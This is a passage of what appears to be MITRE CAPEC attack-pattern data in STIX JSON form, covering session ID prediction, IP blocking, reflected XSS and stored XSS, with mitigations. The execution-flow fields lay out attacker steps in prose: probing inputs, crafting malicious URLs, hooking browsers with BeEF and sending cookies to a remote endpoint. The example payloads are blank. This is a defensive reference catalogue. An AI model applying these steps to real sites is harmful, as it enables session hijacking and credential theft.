"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fe24de-1db9-45eb-8e29-7ca9bc4049d1", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a .onion domain with Tor support", + "id": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43839acc-f71a-4622-9a26-8bf9926bbfc4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb9876b-b0f0-4204-b8dc-c89ee967c2c8", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.", + "external_references": [ + { + "external_id": "CAPEC-59", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/331.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Credential/Session Prediction", + "external_id": "18", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Credential/Session-Prediction" + }, + { + "description": "Session Prediction", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_Prediction" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Credential Falsification through Prediction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks. See also: CVE-2006-6969", + "mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. See also: CVE-2001-1534" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find Session IDs: The attacker interacts with the target host and finds that session IDs are used to authenticate users.

    2. Techniques
    An attacker makes many anonymous connections and records the session IDs assigned.
    An attacker makes authorized connections and records the session tokens or credentials issued.

  2. Characterize IDs: The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.

    3. Techniques
    Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
    Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs
    Comparison against time. The attacker plots or compares the issued IDs to the time they were issued to check for correlation.

Experiment

  1. Match issued IDs: The attacker brute forces different values of session ID and manages to predict a valid session ID.

    2. Techniques
    The attacker models the session ID algorithm enough to produce a compatible session IDs, or just one match.

Exploit

  1. Use matched Session ID: The attacker uses the falsified session ID to access the target system.

    2. Techniques
    The attacker loads the session ID into their web browser and browses to restricted data or functionality.
    The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are predictable. For example, the session IDs are generated using predictable information (e.g., time)." + ], + "x_capec_skills_required": { + "Low": "There are tools to brute force session ID. Those tools require a low level of knowledge.", + "Medium": "Predicting Session ID may require more computation work which uses advanced analysis such as statistical analysis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strong source of randomness to generate a session ID.", + "id": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9653be54-5c63-4cb9-a759-0537fc56da14", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--331d7a82-5ec2-4222-9a34-3dd042df0332", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use adequate length session IDs", + "id": "course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b5dfcf0-d8fd-4206-b790-076311f94f3b", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26815e36-facf-44a4-98fa-472dec102e01", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use information available to the user in order to generate session ID (e.g., time).", + "id": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--faa68fd6-54d2-4ba3-ad2b-1dd82865bae5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4b1f9f3-b1f6-4741-8fa9-b3ba8e8189ec", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ideas for creating random numbers are offered by Eastlake [RFC1750]", + "id": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c1ee684-47b3-455a-a377-97959a7a6492", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d597339-bf05-4276-b31f-4cda813cd170", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format.", + "id": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-59-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dafccdf5-4f55-4b8f-888e-9e37f2ccbbd5", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd948cdf-d470-4ae5-a2fa-3183fe8eb425", + "spec_version": "2.1", + "target_ref": "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.", + "external_references": [ + { + "external_id": "CAPEC-590", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/590.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Abdelberi Chaabane, Terence Chen, Mathieu Cunche, Emiliano De Cristofaro, Arik Friedman, Mohamed Ali Kaafar, Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014--02, IMC 2014", + "external_id": "REF-475", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "modified": "2019-04-04T00:00:00.000Z", + "name": "IP Address Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking packets intended for a target IP address denies its availability to the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a large pool of backup IPs built into the application and support proxy capability in the application.", + "id": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-590-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fba19fbc-d42f-448a-8713-882e084e8a75", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e20e7f2-3b85-4548-9a70-bceee0970a14", + "spec_version": "2.1", + "target_ref": "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \"reflected\" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application.", + "external_references": [ + { + "external_id": "CAPEC-591", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/591.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-604", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reflected XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Reflected attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called ‘mysite’ dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:\n Test URL\"?>\n The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker’s web page, such as:\n \"http://attackerswebsite.com?\"\n The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim’s web browser then executes the injected script, thus compromising the victim’s machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fail to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write malicious scripts and embed them into HTTP requests." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38865cc3-9b96-4cac-807c-bf7bad91ecd3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "spec_version": "2.1", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d36c215-a1eb-43b0-891e-fa3bab2cf037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "spec_version": "2.1", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34cccb39-8413-4427-800d-cb131ff13a29", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "spec_version": "2.1", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a form of Cross-site Scripting (XSS) where a malicious script is persistently \"stored\" within the data storage of a vulnerable web application as valid input.", + "external_references": [ + { + "external_id": "CAPEC-592", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/592.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-605", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Stored XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486" + ], + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Stored XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Stored XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator's authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.", + "An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of their message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application. The adversary is looking for areas where user input is stored, such as user profiles, shopping carts, file managers, forums, blogs, and logs.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for stored XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings to submit script in input fields that could be stored by the web application. If possible, the probe strings contain a unique identifier so they can be queried for after submitting to see if they are stored.
    Use a list of HTML special characters to submit in input fields that could be stored by the web application and check if they were properly encoded, replaced, or filtered out.

  2. Store malicious XSS content: Once the adversary has determined which stored locations are vulnerable to XSS, they will interact with the web application to store the malicious content. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

    3. Techniques
    Store a malicious script on a page that will execute when viewed by the victim.
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

    2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
", + "x_capec_extended_description": "\n Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attributes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + 